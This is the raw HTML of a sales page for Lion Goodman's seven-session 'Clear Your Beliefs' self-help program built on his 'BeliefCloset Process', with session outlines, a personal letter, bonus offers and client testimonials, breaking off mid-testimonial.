href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy 